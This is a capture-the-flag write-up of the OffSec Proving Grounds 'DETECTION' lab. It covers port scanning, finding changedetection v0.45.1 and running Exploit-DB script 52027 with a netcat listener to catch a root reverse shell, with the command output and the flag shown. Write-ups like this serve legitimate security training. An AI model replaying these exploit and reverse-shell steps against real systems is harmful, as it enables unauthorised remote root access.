Skip to main content
  1. Posts/

OFFSEC - Proving Grounds - DETECTION

·1087 words·6 mins·
OFFSEC PG PRACTICE CHANGEDETECTION
Author
Table of Contents

Summary
#

On port 5000 there is an application running called changedetection v0.45.1. Using a remote code execution exploit we can get initial access as the root user.

Specifications
#

  • Name: DETECTION
  • Platform: PG PRACTICE
  • Points: 10
  • Difficulty: Easy
  • System overview: Linux detection 5.4.0-186-generic #206-Ubuntu SMP Fri Apr 26 12:31:10 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
  • IP address: 192.168.209.97
  • OFFSEC provided credentials: None
  • HASH: local.txt: None
  • HASH: proof.txt:c92a6ef9fa1eb5c8cdc2a44fdbf2b2a1

Preparation
#

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure
mkdir detection && cd detection && mkdir enum files exploits uploads tools

## list directory
ls -la

total 28
drwxrwxr-x  7 kali kali 4096 Aug 30 18:36 .
drwxrwxr-x 47 kali kali 4096 Aug 30 18:36 ..
drwxrwxr-x  2 kali kali 4096 Aug 30 18:36 enum
drwxrwxr-x  2 kali kali 4096 Aug 30 18:36 exploits
drwxrwxr-x  2 kali kali 4096 Aug 30 18:36 files
drwxrwxr-x  2 kali kali 4096 Aug 30 18:36 tools
drwxrwxr-x  2 kali kali 4096 Aug 30 18:36 uploads

## set bash variable
ip=192.168.209.97

## ping target to check if it's online
ping $ip

PING 192.168.209.97 (192.168.209.97) 56(84) bytes of data.
64 bytes from 192.168.209.97: icmp_seq=1 ttl=61 time=17.2 ms
64 bytes from 192.168.209.97: icmp_seq=2 ttl=61 time=17.5 ms
^C
--- 192.168.209.97 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 17.183/17.344/17.505/0.161 ms

Reconnaissance
#

Portscanning
#

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.209.97:22
Open 192.168.209.97:5000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 18:37 CEST
Initiating Ping Scan at 18:37
Scanning 192.168.209.97 [4 ports]
Completed Ping Scan at 18:37, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:37
Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:37
Scanning 192.168.209.97 [2 ports]
Discovered open port 5000/tcp on 192.168.209.97
Discovered open port 22/tcp on 192.168.209.97
Completed SYN Stealth Scan at 18:37, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.209.97
Host is up, received echo-reply ttl 61 (0.017s latency).
Scanned at 2025-08-30 18:37:02 CEST for 1s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 61
5000/tcp open  upnp    syn-ack ttl 61

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Copy the output of open ports into a file called ports within the files directory.

## edit the ``files/ports` file
nano files/ports

## content `ports` file:
22/tcp   open  ssh     syn-ack ttl 61
5000/tcp open  upnp    syn-ack ttl 61

Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:

## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..

## output previous command
22,5000

## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,5000 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFR/u8yZrrxkDWw/8gy/fNFksvT+QIL8O/6eD8zVxwKwgBURa9uRtOC8Dk6P+ktLwXJ9oSUitZeXVWjijbehpZBVHvywEOj9nc0bmk0+M/DGGbr1etS7cDvRzRATUtMPxQfYhzXqHlZe6Q2GfA0c75uybUXxOha8CTdK0Iv/maUUaiaPv3LGebQ4CpNaXNQfYVpCdsxLn5MxFi+tfenn/4CinBPn1Ahnx499V1G0ANTaKLsEETjqaMd5jnmml2wH1GmKfKf/6FevWv0Q9Ylsi3x/ipkDpcQAMRQ/aw5NuSSDrGTdo0wRuuoEf5Ybenp9haPVxUAPHbEcMI2hdcP5B3Cd03qimMhHEkFXE8sTUxRKHG+hg7cF8On1EXZsH1fsVyrFAAoHRrap5CsubmNXT93EcK7lc65DbKgeqls643x0p/4WOUiLXFstm6X4JCdEyhvWmnYtL3qDKMuQbCwrCJGeDjoaZTjHXbpjSxSnvtO04RT84x2t8MThyeYO3kSyM=
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNBWjceIJ9NSOLk8zk68zCychWoLxrcrsuJYy2C1pvpfOhVBrr8QBhYbJxzzGJ7DpuMT/DXiCwuLXdu0zeR4/Dk=
|   256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG3LJwn9us7wxvkL0E6EEgOPG3P0fa0fRVuJuXeASZvs
5000/tcp open  http    syn-ack ttl 61 Python http.server 3.5 - 3.10
|_http-title: Change Detection
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access
# 

5000/tcp open  http    syn-ack ttl 61 Python http.server 3.5 - 3.10
|_http-title: Change Detection
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS

On port 5000 there is a web application called changedetection version v0.45.1.

Using searchsploit we can find an exploit available for this application. We download this exploit and install some python modules that are required to run the exploit. We’ll do this in a virtual Python environment to keep our environment clean. Once installed, we get our local IP address, setup a listener and run the exploit. When run we get initial access as the root user. Privilege escalation isn’t required.

## change directory
cd exploits

## using searchsploit to find an exploit for `changedetection`
searchsploit changedetection                                    
----------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                 |  Path
----------------------------------------------------------------------------------------------- ---------------------------------
changedetection < 0.45.20 - Remote Code Execution (RCE)                                        | multiple/webapps/52027.py
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

## download the exploit
searchsploit -m multiple/webapps/52027.py
  Exploit: changedetection < 0.45.20 - Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52027
     Path: /usr/share/exploitdb/exploits/multiple/webapps/52027.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/hk/offsec/pg/practice/detection/exploits/52027.py

## setup a virtual environment called `venv`
python3 -m venv venv

## activate the virtual environment
source venv/bin/activate

## install required modules
pip3 install pwn
pip3 install bs4

## get the local IP address on tun0
ip a | grep -A 10 tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.204/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::5094:2f91:6b35:4a28/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...

## run the exploit
python 52027.py --url http://192.168.209.97:5000/ --port 9001 --ip 192.168.45.204
Obtained CSRF token: IjVlZDhiZjIwYjk3NWFlOTNhNWZhMDg5ZDkwNTUxMGI3ZjVjMTM2NGEi.aLMsug.bJdrblCDt9qur_8d_ypdnXyH_kI
Redirect URL: /edit/5e1a8940-1f2e-488f-b53f-da2f0dc1d5eb?unpause_on_save=1

## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.209.97] 40920
root@detection:/# 

## print `proof.txt`
root@detection:/# cat /root/proof.txt
cat /root/proof.txt
c92a6ef9fa1eb5c8cdc2a44fdbf2b2a1

References
#

[+] https://www.exploit-db.com/exploits/52027

Related

OFFSEC - Proving Grounds - FRACTAL
·3258 words·16 mins
OFFSEC PG PRACTICE SYMFONY PROFILER PROFTPD MYSQL SSH-KEYGEN
Exploit Symfony 3.4.46 on port 80 via /_fragment RCE for initial access. Use MySQL creds from proftpd to add benoit user, log in via FTP, add SSH key, and escalate to root with sudo.
OFFSEC - Proving Grounds - MANTIS
·3303 words·16 mins
OFFSEC PG PRACTICE GOBUSTER MANTISBT MYSQL PSPY
Gobuster finds /bugtracker with MantisBT 2.0. Exploit CVE-2017-12419 for MySQL credentials, crack a hash and get www-data via RCE. Mysqldump process runs with credentials and can be reused. Escalate using sudo.
OFFSEC - Proving Grounds - SYNAPSE
·3175 words·15 mins
OFFSEC PG PRACTICE SSI JOHN GPG2JOHN MD5SUM SOCAT
Synapse web app on port 80 allows SSI abuse via profile picture upload. Gain www-data access, crack GPG key to become mindsflee user, then use sudo synapse_commander.py with socat to escalate to root.
OFFSEC - Proving Grounds - COBBLES
·2914 words·14 mins
OFFSEC PG PRACTICE ZONEMINDER HAPROXY DOCKER ESCAPE
Gain initial access via credentials or ZoneMinder exploit. As www-data, exploit HAProxy failover to access backup server as root in Docker. Escalate by copying bash to shared mount for host root access.
OFFSEC - Proving Grounds - SIROL
·2888 words·14 mins
OFFSEC PG PRACTICE KIBANA GLUSTERFS DOCKER ESCAPE
Exploit Kibana 6.5.0 (CVE-2019-7609) for initial access, then mount the host filesystem to get root or exploit glusterfs (CVE-2018-1088) to escalate to root via a created cronjob.
OFFSEC - Proving Grounds - OUTDATED
·2359 words·12 mins
OFFSEC PG PRACTICE MPDF EXIFTOOL CHISEL WEBMIN
SSH or initial access by exploiting the website using mPDF 6.0 and downloading credentials, reuse creds for Webmin on port 10000 to escalate to root.